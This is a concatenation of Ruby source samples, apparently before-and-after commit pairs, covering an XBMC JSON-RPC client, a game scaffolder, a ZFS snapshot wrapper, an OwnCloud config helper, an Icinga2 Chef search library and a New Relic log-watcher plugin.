@connection.command(method, args)
end
# returns all available commands returned by JSON.Introspect
def self.commands
@commands
end
# nicely print out all available commands.
# useful at command line / irb / etc
def self.get_commands
@commands.each {|k,v| self.pp_command k }
return nil
end
# finds and prettily prints appropriate commands based on provided keyword
def self.apropos(find)
regexp = /#{find}/im
matches = []
@commands.each do |k,v|
matches.push(k) if k =~ regexp || v['description'] =~ regexp
end
if matches.empty?
puts "\n\nNo commands found, try being less specific\n\n"
else
matches.each {|command| self.pp_command command }
end
return nil
end
# prettily print out requested command
def self.pp_command(command)
description = @commands[command]['description']
description = "<no description exists for #{command}>" unless !description.empty?
puts "\n\t#{command}"
puts "\t\t#{description}\n\n"
end
# Class to create and store connection information for xbmc server
# also handles actual json back and forth.
class Connection
def initialize(options)
connection_info = {
:server => '127.0.0.1',
:port => '8080',
:user => 'xbmc',
:pass => ''
}
@connection_info = connection_info.merge(options)
@url = URI.parse("http://#{@connection_info[:server]}:#{@connection_info[:port]}/jsonrpc")
end
def command(method, params = {})
command_id = params.delete :id
req = Net::HTTP::Post.new(@url.path)
req.basic_auth @connection_info[:user], @connection_info[:pass]
req.add_field 'Content-Type', 'application/json'
req.body = {
"id" => command_id || 1,
"jsonrpc" => "2.0",
"method" => method,
"params" => params
}.to_json
res = Net::HTTP.new(@url.host, @url.port).start {|http| http.request(req) }
if res.kind_of? Net::HTTPSuccess
return JSON.parse(res.body)
else
return res.error!
end
rescue StandardError
print "Unable to connect to server specified\n", $!
return false
end
end
# utility class for others to inherit from. For now uses method missing
# to make all calls to the send_command because there is no meaningful
# difference between namespaces / methods at the moment.
class APIBase
# get the correct api namespace to use
def self.namespace
@namespace = @namespace || self.name.to_s.split('::')[1]
end
# pass on namespace + method and arguments
def self.method_missing(method, args = {})
XBMC_JSONRPC.command("#{self.namespace}.#{method}", args)
end
# show commands for namespace
def self.commands
XBMC_JSONRPC.commands.keys.grep(/#{self.namespace}\./) {|command| XBMC_JSONRPC.pp_command(command) }
end
end
class JSONRPC < APIBase
# def self.Introspect
# end
# def self.Version
# end
# def self.Permission
# end
# def self.Ping
# end
# def self.Announce
# end
end
class Player < APIBase
# def self.GetActivePlayers
# end
end
class AudioPlayer < APIBase
# same methods as VideoPlayer
end
class VideoPlayer < APIBase
# def self.PlayPause
# end
# def self.Stop
# end
# def self.SkipPrevious
# end
# def self.SkipNext
# end
# def self.BigSkipBackward
# end
# def self.BigSkipForward
# end
# def self.SmallSkipBackward
# end
# def self.SmallSkipForward
# end
# def self.Rewind
# end
# def self.Forward
# end
# def self.GetTime
# end
# def self.GetTimeMS
# end
# def self.GetPercentage
# end
# def self.SeekTime
# end
# def self.SeekPercentage
# end
end
class PicturePlayer < APIBase
# def self.PlayPause
# end
# def self.Stop
# end
# def self.SkipPrevious
# end
# def self.SkipNext
# end
# def self.MoveLeft
# end
# def self.MoveRight
# end
# def self.MoveDown
# end
# def self.MoveUp
# end
# def self.ZoomOut
# end
# def self.ZoomIn
# end
# def self.Zoom
# end
# def self.Rotate
# end
end
class VideoPlaylist < APIBase
# def self.Play
# end
# def self.SkipPrevious
# end
# def self.SkipNext
# end
# def self.GetItems
# end
# def self.Add
# end
# def self.Clear
# end
# def self.Shuffle
# end
# def self.UnShuffle
# end
end
class AudioPlaylist < APIBase
# def self.Play
# end
# def self.SkipPrevious
# end
# def self.SkipNext
# end
# def self.GetItems
# end
# def self.Add
# end
# def self.Clear
# end
# def self.Shuffle
# end
# def self.UnShuffle
# end
end
class Playlist < APIBase
# def self.Create
# end
# def self.Destroy
# end
# def self.GetItems
# end
# def self.Add
# end
# def self.Remove
# end
# def self.Swap
# end
# def self.Shuffle
# end
end
class Files < APIBase
# def self.GetSources
# end
# def self.Download
# end
# def self.GetDirectory
# end
end
class AudioLibrary < APIBase
# def self.GetArtists
# end
# def self.GetAlbums
# end
# def self.GetSongs
# end
# def self.ScanForContent
# end
end
class VideoLibrary < APIBase
# def self.GetMovies
# end
# def self.GetTVShows
# end
# def self.GetSeasons
# end
# def self.GetEpisodes
# end
# def self.GetMusicVideoAlbums
# end
# def self.GetMusicVideos
# end
# def self.GetRecentlyAddedMovies
# end
# def self.GetRecentlyAddedEpisodes
# end
# def self.GetRecentlyAddedMusicVideos
# end
# def self.ScanForContent
# end
end
class System < APIBase
# def self.Shutdown
# end
# def self.Suspend
# end
# def self.Hibernate
# end
# def self.Reboot
# end
# def self.GetInfoLabels
# end
# def self.GetInfoBooleans
# end
end
class XBMC < APIBase
# def self.GetVolume
# end
# def self.SetVolume
# end
# def self.ToggleMute
# end
# def self.Play
# end
# def self.StartSlideShow
# end
# def self.Log
# end
# def self.Quit
# end
end
end
|
module Yeah::Utility
def self.make_project(name)
structure = {}
structure[name] = {
entities: {},
visuals: {},
maps: {},
assets: {},
config: {},
'game.rb' => <<-eoc.unindent
require "yeah"
include Yeah
class #{name.classify}Game < Game
end
eoc
}
make_file_structure(structure)
end
# TODO: clean up this monster
def self.make_file_structure(structure)
make_recursively = lambda do |struct, base_loc=""|
struct.each do |key, value|
new_loc = "#{base_loc}#{key}"
case value
when Hash
new_dir = "#{new_loc}/"
Dir.mkdir(new_dir)
make_recursively.call struct[key], new_dir
when String
File.open(new_loc, 'w') { |f| f.write(value) }
end
end
end
make_recursively.call structure
end
def self.load_project
require_recursively('.')
end
def self.require_recursively(dir)
Pow(dir).files.select { |f| f.extension == 'rb' }.each { |f| require f }
Pow(dir).directories.each { |sd| require_recursively(sd) }
end
def self.project_game_class
game_class_name = Object.constants.find { |c| c[-4..-1] == "Game" }
Kernel.const_get(game_class_name)
end
def self.run_project
project_game_class.new.start
end
end
patch to ensure pow's file#extension
module Yeah::Utility
def self.make_project(name)
structure = {}
structure[name] = {
entities: {},
visuals: {},
maps: {},
assets: {},
config: {},
'game.rb' => <<-eoc.unindent
require "yeah"
include Yeah
class #{name.classify}Game < Game
end
eoc
}
make_file_structure(structure)
end
# TODO: clean up this monster
def self.make_file_structure(structure)
make_recursively = lambda do |struct, base_loc=""|
struct.each do |key, value|
new_loc = "#{base_loc}#{key}"
case value
when Hash
new_dir = "#{new_loc}/"
Dir.mkdir(new_dir)
make_recursively.call struct[key], new_dir
when String
File.open(new_loc, 'w') { |f| f.write(value) }
end
end
end
make_recursively.call structure
end
def self.load_project
require_recursively('.')
end
def self.require_recursively(dir)
pow_spells_correctly = Pow::Base.method_defined? :extension
if !pow_spells_correctly
Pow::Base.class_eval "alias_method :extension, :extention"
end
Pow(dir).files.select { |f| f.extension == 'rb' }.each { |f| require f }
Pow(dir).directories.each { |sd| require_recursively(sd) }
end
def self.project_game_class
game_class_name = Object.constants.find { |c| c[-4..-1] == "Game" }
Kernel.const_get(game_class_name)
end
def self.run_project
project_game_class.new.start
end
end
|
module Yuba
class Service
class_attribute :_properties
self._properties = {}
class << self
def call(**args)
return new.call if args.empty?
new(**args).call
end
def property(name, options = {})
_properties[name.to_sym] = options
end
end
def initialize(**args)
args.keys.each do |key|
unless _properties.has_key?(key.to_sym)
raise ArgumentError, "missing 'property :#{key}' in #{self.class.name} class"
end
end
args.each do |key, value|
define_singleton_method key do
value
end
end
end
def build_form(**args)
form_class.build(**args)
end
def form_class
Object.const_get(form_class_name)
end
def view_model_class
Object.const_get(form_class_name)
end
private
def form_class_name
self.class.name.sub(/::.+Service/, 'Form')
end
def view_model_class_name
self.class.name.sub(/Service\z/, 'ViewModel')
end
end
end
Add setup method like call
module Yuba
class Service
class_attribute :_properties
self._properties = {}
class << self
def call(**args)
return new.call if args.empty?
new(**args).call
end
def setup(**args)
return new.setup if args.empty?
new(**args).setup
end
def property(name, options = {})
_properties[name.to_sym] = options
end
end
def initialize(**args)
args.keys.each do |key|
unless _properties.has_key?(key.to_sym)
raise ArgumentError, "missing 'property :#{key}' in #{self.class.name} class"
end
end
args.each do |key, value|
define_singleton_method key do
value
end
end
end
def build_form(**args)
form_class.build(**args)
end
def form_class
Object.const_get(form_class_name)
end
def view_model_class
Object.const_get(form_class_name)
end
private
def form_class_name
self.class.name.sub(/::.+Service/, 'Form')
end
def view_model_class_name
self.class.name.sub(/Service\z/, 'ViewModel')
end
end
end
|
module Zfs
class Snapshot
@@stale_snapshot_size = false
attr_reader :name
def initialize(name, used)
@name = name
@used = used
end
def used
if @@stale_snapshot_size
cmd = "zfs get -Hp -o value used #{@name}"
@used = %x[#{cmd}].to_i
end
@used
end
### Find all snapshots in the given interval
### @param String match_on The string to match on snapshots
def self.find(match_on=nil)
snapshots = []
cmd = "zfs list -H -t snapshot -o name,used -S name"
IO.popen cmd do |io|
io.readlines.each do |line|
line.chomp!
if match_on.nil? or line.include?(match_on)
snapshot_name,used = line.split(' ')
snapshots << self.new(snapshot_name, used.to_i)
end
end
end
snapshots
end
### Create a snapshot
def self.create(snapshot, options = {})
flags=[]
flags << "-r" if options['recursive']
cmd = "zfs snapshot #{flags.join(" ")} #{snapshot}"
puts cmd
system(cmd) unless $dry_run
end
### Destroy a snapshot
def destroy(options = {})
# If destroying a snapshot, need to flag all other snapshot sizes as stale
# so they will be relooked up.
@@stale_snapshot_size = true
# Default to deferred snapshot destroying
flags=["-d"]
flags << "-r" if options['recursive']
cmd = "zfs destroy #{flags.join(" ")} #{@name}"
puts cmd
system(cmd) unless $dry_run
end
end
end
Support creating new snapshot without knowing its size
module Zfs
class Snapshot
@@stale_snapshot_size = false
attr_reader :name
def initialize(name, used=nil)
@name = name
@used = used
end
def used
if @used.nil? or @@stale_snapshot_size
cmd = "zfs get -Hp -o value used #{@name}"
@used = %x[#{cmd}].to_i
end
@used
end
### Find all snapshots in the given interval
### @param String match_on The string to match on snapshots
def self.find(match_on=nil)
snapshots = []
cmd = "zfs list -H -t snapshot -o name,used -S name"
IO.popen cmd do |io|
io.readlines.each do |line|
line.chomp!
if match_on.nil? or line.include?(match_on)
snapshot_name,used = line.split(' ')
snapshots << self.new(snapshot_name, used.to_i)
end
end
end
snapshots
end
### Create a snapshot
def self.create(snapshot, options = {})
flags=[]
flags << "-r" if options['recursive']
cmd = "zfs snapshot #{flags.join(" ")} #{snapshot}"
puts cmd
system(cmd) unless $dry_run
end
### Destroy a snapshot
def destroy(options = {})
# If destroying a snapshot, need to flag all other snapshot sizes as stale
# so they will be relooked up.
@@stale_snapshot_size = true
# Default to deferred snapshot destroying
flags=["-d"]
flags << "-r" if options['recursive']
cmd = "zfs destroy #{flags.join(" ")} #{@name}"
puts cmd
system(cmd) unless $dry_run
end
end
end
|
created a library to deal with owncloud config
require 'json'
module OwnCloud
class Config
attr_reader :options
def initialize(file)
@file = file
@options = Hash.new
@original_options = Hash.new
read
end
def merge(new_options)
@options.merge!(new_options) if new_options.kind_of?(Hash)
end
def read()
begin
return unless ::File.exists?(@file)
f = IO.popen('php', 'r+')
f.write "<?php require('#{@file}'); echo json_encode($CONFIG);"
f.close_write
data = f.read
f.close
@options = JSON.parse(data)
@original_options = @options.clone
rescue Exception => e
Chef::Application.fatal!("Error reading OwnCloud config: #{e.message}")
end
end
def write()
begin
return if @options == @original_options
f = IO.popen('php', 'r+')
f.write "<?php var_export(json_decode('#{@options.to_json}', true));"
f.close_write
data = f.read
f.close
IO.write(@file, "<?php\n$CONFIG = #{data};\n")
Chef::Log.info("OwnCloud config written")
rescue Exception => e
Chef::Application.fatal!("Error writting OwnCloud config: #{e.message}")
end
end
end
end
|
#
# Cookbook Name:: icinga2
# Recipe:: search
#
# Copyright 2014, Virender Khatri
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'chef'
require 'chef/node'
require 'chef/rest'
require 'chef/role'
require 'chef/environment'
require 'chef/data_bag'
require 'chef/data_bag_item'
require 'resolv'
module Icinga2
# fetch node information into Hash
class Search
attr_accessor :query, :environment, :enable_cluster_hostgroup, :cluster_attribute,
:enable_application_hostgroup, :application_attribute, :ignore_node_error,
:ignore_resolv_error, :exclude_recipes, :exclude_roles, :env_custom_vars,
:limit_region, :server_region, :search_pattern, :use_fqdn_resolv,
:add_cloud_custom_vars,
:env_filter_node_vars, :failover_fqdn_address
def initialize(options = {})
@query = options
@environment = options[:environment]
@enable_cluster_hostgroup = options[:enable_cluster_hostgroup]
@cluster_attribute = options[:cluster_attribute]
@enable_application_hostgroup = options[:enable_application_hostgroup]
@application_attribute = options[:application_attribute]
@ignore_node_error = options[:ignore_node_error]
@ignore_resolv_error = options[:ignore_resolv_error]
@exclude_recipes = options[:exclude_recipes]
@exclude_roles = options[:exclude_roles]
@env_custom_vars = options[:env_custom_vars]
@limit_region = options[:limit_region]
@server_region = options[:server_region]
@search_pattern = options[:search_pattern]
@use_fqdn_resolv = options[:use_fqdn_resolv]
@add_cloud_custom_vars = options[:add_cloud_custom_vars]
@env_filter_node_vars = options[:env_filter_node_vars]
@failover_fqdn_address = options[:failover_fqdn_address]
end
def fqdn_resolv(fqdn)
begin
address = Resolv.getaddress(fqdn)
rescue
address = false
end
address
end
def variable_check(var)
var.to_s.empty? ? false : true
end
def environment_resources
s = Chef::Search::Query.new
results = s.search('node', search_pattern)[0]
convert_resources(results)
end
def convert_resources(results)
nodes = {}
clusters = []
applications = []
roles = []
recipes = []
results.each do |node|
node_hash = convert_node(node)
# match node attributes to given env attributes
env_filter_node_vars.each do |k, v|
unless node_hash[k] == v
Chef::Log.warn("node#{k}=#{node_hash[k]} does not match with env_filter_node_vars[#{k}]=#{env_filter_node_vars[k]}, node ignored")
next
end
end
# skip node if set not to monitor
if node['monitoring_off'] == true
Chef::Log.warn("#{node_hash['name']} is set to turn off the monitoring, node ignored")
next
end
# check server region with node region
if limit_region && server_region
# skip region check if node_region value is not present
if variable_check(node_hash['node_region'])
# skip node if server and node region does not match
next unless server_region == node_hash['node_region']
end
end
# skip node if unable to resolv node fqdn
unless node_hash['address']
unless ignore_resolv_error
Chef::Log.warn("#{node_hash['name']} unable to resolv fqdn, node ignored")
next
end
end
# skip node if recipe/role to be excluded
# code here
begin
# check node attributes
validate_node(node_hash)
rescue => error
# ignore node if unable to determine all attributes
unless ignore_node_error
Chef::Log.warn("#{error.message}, node ignored")
next
end
end
# collect node roles / recipes
roles += node_hash['roles']
recipes += node_hash['recipes']
if node_hash['custom_vars'].key?('hostgroups')
if node_hash['custom_vars']['hostgroups'].is_a?(Array)
node_hash['custom_vars']['hostgroups'].push node_hash['chef_environment']
else
fail "node 'hostgroups' must be defined as an Array of HostGroup name (node['icinga2']['client']['custom_vars']['hostgroups'])"
end
else
node_hash['custom_vars']['hostgroups'] = [node_hash['chef_environment']]
end
# collect nodes cluster
if variable_check(node_hash[cluster_attribute]) && enable_cluster_hostgroup
clusters.push node_hash[cluster_attribute]
node_hash['custom_vars']['hostgroups'].push node_hash['chef_environment'] + '-' + node_hash[cluster_attribute]
end
# collect node application types
if node_hash[application_attribute].is_a?(Array) && enable_application_hostgroup
applications += node_hash[application_attribute].uniq
node_hash[application_attribute].uniq.each do |a|
node_hash['custom_vars']['hostgroups'].push node_hash['chef_environment'] + '-' + a if variable_check(a)
end
elsif node_hash[application_attribute].is_a?(String) && variable_check(node_hash[application_attribute]) && enable_application_hostgroup
applications.push node_hash[application_attribute]
node_hash['custom_vars']['hostgroups'].push node_hash['chef_environment'] + '-' + node_hash[application_attribute]
end
node_hash['custom_vars']['hostgroups'].uniq!
# need to verify whether we need hostgroups for node
# node_hash['hostgroups'] = node_hash['custom_vars']['hostgroups']
nodes[node_hash['fqdn']] = node_hash
end
{ 'nodes' => nodes, 'recipes' => recipes.sort.uniq, 'roles' => roles.sort.uniq, 'clusters' => clusters.sort.uniq, 'applications' => applications.sort.uniq }
end
def convert_node(node)
# prepare Node Hash object
node_hash = {}
node_hash['name'] = node.name
if use_fqdn_resolv
# lookup ip address from node fqdn
node_hash['address'] = fqdn_resolv(node_hash['name'])
node_hash['address'] = node['ipaddress'] if failover_fqdn_address && !node_hash['address']
else
node_hash['address'] = node['ipaddress']
end
node_hash['address6'] = node['ip6address']
node_hash['chef_environment'] = node.chef_environment
node_hash['environment'] = node.chef_environment
node_hash['run_list'] = node.run_list
node_hash['recipes'] = !node.run_list.nil? ? node.run_list.recipes : []
node_hash['roles'] = !node.run_list.nil? ? node.run_list.roles : []
node_hash['fqdn'] = node['fqdn']
node_hash['hostname'] = node['hostname']
node_hash['kernel_machine'] = !node['kernel'].nil? ? node['kernel']['machine'] : nil
node_hash['kernel_os'] = !node['kernel'].nil? ? node['kernel']['os'] : nil
node_hash['os'] = node['os']
node_hash['platform'] = node['platform']
node_hash['platform_version'] = node['platform_version']
node_hash['tags'] = node['tags']
node_hash['disks'] = node['filesystem'].map { |d, o| d if d.to_s =~ /^\/dev/ && o['fs_type'] != 'swap' }.compact
node_hash['custom_vars'] = node_custom_vars(node['icinga2'])
# chef client last run
# node_hash['last_known_run'] = Time.at(node.automatic['ohai_time'])
# not required, keeping it for the moment
node_hash['custom_vars']['tags'] = node_hash['tags']
node_hash['custom_vars']['disks'] = node_hash['disks']
# add default chef attributes
node_hash['custom_vars']['platform'] = node_hash['platform']
node_hash['custom_vars']['platform_version'] = node_hash['platform_version']
node_hash['custom_vars']['cpu'] = node['cpu']['total']
if node['memory']['total']
node_hash['custom_vars']['memory'] = (node['memory']['total'].gsub(/\D/, '').to_i / 1024).to_s + 'MB'
end
node_hash['custom_vars']['environment'] = node_hash['chef_environment']
node_hash['custom_vars']['run_list'] = node_hash['run_list'].to_s
if enable_cluster_hostgroup && cluster_attribute
node_hash[cluster_attribute] = node[cluster_attribute.to_sym].to_s
node_hash['custom_vars'][cluster_attribute] = node_hash[cluster_attribute].to_s
end
if enable_application_hostgroup && application_attribute
node_hash[application_attribute] = node[application_attribute] || []
node_hash['custom_vars'][application_attribute] = node_hash[application_attribute] || []
end
if add_cloud_custom_vars
if node.key?('ec2')
node_hash['node_region'] = node['ec2']['placement_availability_zone'].chop
node_hash['custom_vars']['node_id'] = node['ec2']['instance_id']
node_hash['custom_vars']['node_type'] = node['ec2']['instance_type']
node_hash['custom_vars']['node_zone'] = node['ec2']['placement_availability_zone']
node_hash['custom_vars']['node_region'] = node['ec2']['placement_availability_zone'].chop
node_hash['custom_vars']['node_security_groups'] = node['ec2']['security_groups']
node_hash['custom_vars']['node_wan_address'] = node['ec2']['public_ipv4'].to_s
node['ec2']['network_interfaces_macs'].each do |_net, net_options|
node_hash['custom_vars']['node_vpc_cidr'] = net_options['vpc_ipv4_cidr_block'].to_s
break
end
else
# check for other cloud providers
node_hash['node_region'] = nil
end
end
# add node custom vars from environment lwrp
env_custom_vars.each do |k, v|
node_hash['custom_vars'][k] = v if variable_check(k)
end
node_hash
end
def node_custom_vars(vars)
custom_vars = {}
# add icinga2 host custom vars from node custom_vars
if vars && vars.key?('client')
if vars['client'].key?('custom_vars') && vars['client']['custom_vars'].is_a?(Hash)
custom_vars = vars['client']['custom_vars'].to_hash
end
end
custom_vars
end
def validate_node(node_hash)
fail ArgumentError, "#{node_hash['name']} missing 'chef_environment'" unless node_hash['chef_environment']
fail ArgumentError, "#{node_hash['name']} missing 'fqdn'" unless node_hash['fqdn']
fail ArgumentError, "#{node_hash['name']} missing 'hostname'" unless node_hash['hostname']
end
end
end
add only mount point devices
#
# Cookbook Name:: icinga2
# Recipe:: search
#
# Copyright 2014, Virender Khatri
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'chef'
require 'chef/node'
require 'chef/rest'
require 'chef/role'
require 'chef/environment'
require 'chef/data_bag'
require 'chef/data_bag_item'
require 'resolv'
module Icinga2
# fetch node information into Hash
class Search
attr_accessor :query, :environment, :enable_cluster_hostgroup, :cluster_attribute,
:enable_application_hostgroup, :application_attribute, :ignore_node_error,
:ignore_resolv_error, :exclude_recipes, :exclude_roles, :env_custom_vars,
:limit_region, :server_region, :search_pattern, :use_fqdn_resolv,
:add_cloud_custom_vars,
:env_filter_node_vars, :failover_fqdn_address
def initialize(options = {})
@query = options
@environment = options[:environment]
@enable_cluster_hostgroup = options[:enable_cluster_hostgroup]
@cluster_attribute = options[:cluster_attribute]
@enable_application_hostgroup = options[:enable_application_hostgroup]
@application_attribute = options[:application_attribute]
@ignore_node_error = options[:ignore_node_error]
@ignore_resolv_error = options[:ignore_resolv_error]
@exclude_recipes = options[:exclude_recipes]
@exclude_roles = options[:exclude_roles]
@env_custom_vars = options[:env_custom_vars]
@limit_region = options[:limit_region]
@server_region = options[:server_region]
@search_pattern = options[:search_pattern]
@use_fqdn_resolv = options[:use_fqdn_resolv]
@add_cloud_custom_vars = options[:add_cloud_custom_vars]
@env_filter_node_vars = options[:env_filter_node_vars]
@failover_fqdn_address = options[:failover_fqdn_address]
end
def fqdn_resolv(fqdn)
begin
address = Resolv.getaddress(fqdn)
rescue
address = false
end
address
end
def variable_check(var)
var.to_s.empty? ? false : true
end
def environment_resources
s = Chef::Search::Query.new
results = s.search('node', search_pattern)[0]
convert_resources(results)
end
def convert_resources(results)
nodes = {}
clusters = []
applications = []
roles = []
recipes = []
results.each do |node|
node_hash = convert_node(node)
# match node attributes to given env attributes
env_filter_node_vars.each do |k, v|
unless node_hash[k] == v
Chef::Log.warn("node#{k}=#{node_hash[k]} does not match with env_filter_node_vars[#{k}]=#{env_filter_node_vars[k]}, node ignored")
next
end
end
# skip node if set not to monitor
if node['monitoring_off'] == true
Chef::Log.warn("#{node_hash['name']} is set to turn off the monitoring, node ignored")
next
end
# check server region with node region
if limit_region && server_region
# skip region check if node_region value is not present
if variable_check(node_hash['node_region'])
# skip node if server and node region does not match
next unless server_region == node_hash['node_region']
end
end
# skip node if unable to resolv node fqdn
unless node_hash['address']
unless ignore_resolv_error
Chef::Log.warn("#{node_hash['name']} unable to resolv fqdn, node ignored")
next
end
end
# skip node if recipe/role to be excluded
# code here
begin
# check node attributes
validate_node(node_hash)
rescue => error
# ignore node if unable to determine all attributes
unless ignore_node_error
Chef::Log.warn("#{error.message}, node ignored")
next
end
end
# collect node roles / recipes
roles += node_hash['roles']
recipes += node_hash['recipes']
if node_hash['custom_vars'].key?('hostgroups')
if node_hash['custom_vars']['hostgroups'].is_a?(Array)
node_hash['custom_vars']['hostgroups'].push node_hash['chef_environment']
else
fail "node 'hostgroups' must be defined as an Array of HostGroup name (node['icinga2']['client']['custom_vars']['hostgroups'])"
end
else
node_hash['custom_vars']['hostgroups'] = [node_hash['chef_environment']]
end
# collect nodes cluster
if variable_check(node_hash[cluster_attribute]) && enable_cluster_hostgroup
clusters.push node_hash[cluster_attribute]
node_hash['custom_vars']['hostgroups'].push node_hash['chef_environment'] + '-' + node_hash[cluster_attribute]
end
# collect node application types
if node_hash[application_attribute].is_a?(Array) && enable_application_hostgroup
applications += node_hash[application_attribute].uniq
node_hash[application_attribute].uniq.each do |a|
node_hash['custom_vars']['hostgroups'].push node_hash['chef_environment'] + '-' + a if variable_check(a)
end
elsif node_hash[application_attribute].is_a?(String) && variable_check(node_hash[application_attribute]) && enable_application_hostgroup
applications.push node_hash[application_attribute]
node_hash['custom_vars']['hostgroups'].push node_hash['chef_environment'] + '-' + node_hash[application_attribute]
end
node_hash['custom_vars']['hostgroups'].uniq!
# need to verify whether we need hostgroups for node
# node_hash['hostgroups'] = node_hash['custom_vars']['hostgroups']
nodes[node_hash['fqdn']] = node_hash
end
{ 'nodes' => nodes, 'recipes' => recipes.sort.uniq, 'roles' => roles.sort.uniq, 'clusters' => clusters.sort.uniq, 'applications' => applications.sort.uniq }
end
def convert_node(node)
# prepare Node Hash object
node_hash = {}
node_hash['name'] = node.name
if use_fqdn_resolv
# lookup ip address from node fqdn
node_hash['address'] = fqdn_resolv(node_hash['name'])
node_hash['address'] = node['ipaddress'] if failover_fqdn_address && !node_hash['address']
else
node_hash['address'] = node['ipaddress']
end
node_hash['address6'] = node['ip6address']
node_hash['chef_environment'] = node.chef_environment
node_hash['environment'] = node.chef_environment
node_hash['run_list'] = node.run_list
node_hash['recipes'] = !node.run_list.nil? ? node.run_list.recipes : []
node_hash['roles'] = !node.run_list.nil? ? node.run_list.roles : []
node_hash['fqdn'] = node['fqdn']
node_hash['hostname'] = node['hostname']
node_hash['kernel_machine'] = !node['kernel'].nil? ? node['kernel']['machine'] : nil
node_hash['kernel_os'] = !node['kernel'].nil? ? node['kernel']['os'] : nil
node_hash['os'] = node['os']
node_hash['platform'] = node['platform']
node_hash['platform_version'] = node['platform_version']
node_hash['tags'] = node['tags']
node_hash['disks'] = node['filesystem'].map { |d, o| d if d.to_s =~ /^\/dev/ && o['fs_type'] != 'swap' && o.key?('mount') }.compact
node_hash['custom_vars'] = node_custom_vars(node['icinga2'])
# chef client last run
# node_hash['last_known_run'] = Time.at(node.automatic['ohai_time'])
# not required, keeping it for the moment
node_hash['custom_vars']['tags'] = node_hash['tags']
node_hash['custom_vars']['disks'] = node_hash['disks']
# add default chef attributes
node_hash['custom_vars']['platform'] = node_hash['platform']
node_hash['custom_vars']['platform_version'] = node_hash['platform_version']
node_hash['custom_vars']['cpu'] = node['cpu']['total']
if node['memory']['total']
node_hash['custom_vars']['memory'] = (node['memory']['total'].gsub(/\D/, '').to_i / 1024).to_s + 'MB'
end
node_hash['custom_vars']['environment'] = node_hash['chef_environment']
node_hash['custom_vars']['run_list'] = node_hash['run_list'].to_s
if enable_cluster_hostgroup && cluster_attribute
node_hash[cluster_attribute] = node[cluster_attribute.to_sym].to_s
node_hash['custom_vars'][cluster_attribute] = node_hash[cluster_attribute].to_s
end
if enable_application_hostgroup && application_attribute
node_hash[application_attribute] = node[application_attribute] || []
node_hash['custom_vars'][application_attribute] = node_hash[application_attribute] || []
end
if add_cloud_custom_vars
if node.key?('ec2')
node_hash['node_region'] = node['ec2']['placement_availability_zone'].chop
node_hash['custom_vars']['node_id'] = node['ec2']['instance_id']
node_hash['custom_vars']['node_type'] = node['ec2']['instance_type']
node_hash['custom_vars']['node_zone'] = node['ec2']['placement_availability_zone']
node_hash['custom_vars']['node_region'] = node['ec2']['placement_availability_zone'].chop
node_hash['custom_vars']['node_security_groups'] = node['ec2']['security_groups']
node_hash['custom_vars']['node_wan_address'] = node['ec2']['public_ipv4'].to_s
node['ec2']['network_interfaces_macs'].each do |_net, net_options|
node_hash['custom_vars']['node_vpc_cidr'] = net_options['vpc_ipv4_cidr_block'].to_s
break
end
else
# check for other cloud providers
node_hash['node_region'] = nil
end
end
# add node custom vars from environment lwrp
env_custom_vars.each do |k, v|
node_hash['custom_vars'][k] = v if variable_check(k)
end
node_hash
end
def node_custom_vars(vars)
custom_vars = {}
# add icinga2 host custom vars from node custom_vars
if vars && vars.key?('client')
if vars['client'].key?('custom_vars') && vars['client']['custom_vars'].is_a?(Hash)
custom_vars = vars['client']['custom_vars'].to_hash
end
end
custom_vars
end
def validate_node(node_hash)
fail ArgumentError, "#{node_hash['name']} missing 'chef_environment'" unless node_hash['chef_environment']
fail ArgumentError, "#{node_hash['name']} missing 'fqdn'" unless node_hash['fqdn']
fail ArgumentError, "#{node_hash['name']} missing 'hostname'" unless node_hash['hostname']
end
end
end
|
#!/usr/bin/env ruby
require "rubygems"
require "bundler/setup"
require "newrelic_plugin"
#
#
# NOTE: Please add the following lines to your Gemfile:
# gem "newrelic_plugin", git: "git@github.com:newrelic-platform/newrelic_plugin.git"
#
#
# Note: You must have a config/newrelic_plugin.yml file that
# contains the following information in order to use
# this Gem:
#
# newrelic:
# # Update with your New Relic account license key:
# license_key: 'put_your_license_key_here'
# # Set to '1' for verbose output, remove for normal output.
# # All output goes to stdout/stderr.
# verbose: 1
# agents:
# logwatcher:
# # Full path to the the log file
# log_path: tmp.log
# # Returns the number of matches for this term. Use Linux Regex formatting.
# # Default: "[Ee]rror"
# term: "[Ee]rror"
# # Provide any options to pass to grep when running.
# # For example, to count non-matching lines, enter 'v'.
# # Use the abbreviated format ('v' and not 'invert-match').
# grep_options:
#
#
module NewRelic::Processor
class DiffRate<NewRelic::Plugin::Processor::Base
def initialize
super :diff_rate,"DiffRate"
end
def process val
val=val.to_f
ret=nil
curr_time=Time.now
if @last_time and curr_time>@last_time
ret=val/(curr_time-@last_time).to_f
end
@last_value=val
@last_time=curr_time
ret
end
end
end
module LogwatcherAgent
class Agent < NewRelic::Plugin::Agent::Base
agent_guid "DROP_GUID_FROM_PLUGIN_HERE"
agent_config_options :log_path, :term, :grep_options
agent_human_labels("Logwatcher") { "#{log_path}" }
def setup_metrics
@occurances=NewRelic::Processor::DiffRate.new
end
def poll_cycle
check_params
@last_length ||= 0
current_length = `wc -c #{log_path}`.split(' ')[0].to_i
count = 0
# don't run it the first time
if (@last_length > 0 )
read_length = current_length - @last_length
# Check to see if this file was rotated. This occurs when the +current_length+ is less than
# the +last_run+. Don't return a count if this occured.
if read_length >= 0
# finds new content from +last_length+ to the end of the file, then just extracts from the recorded
# +read_length+. This ignores new lines that are added after finding the +current_length+. Those lines
# will be read on the next run.
count = `tail -c +#{@last_length+1} #{log_path} | head -c #{read_length} | grep "#{term}" -#{grep_options.to_s.gsub('-','')}c`.strip.to_f
end
end
report_metric("Matches/Total", "Occurances", @occurances.process(count)) if count
@last_length = current_length
end
private
def term
@term || "[Ee]rror"
end
def check_params
@log_path = log_path.to_s.strip
if log_path.empty?
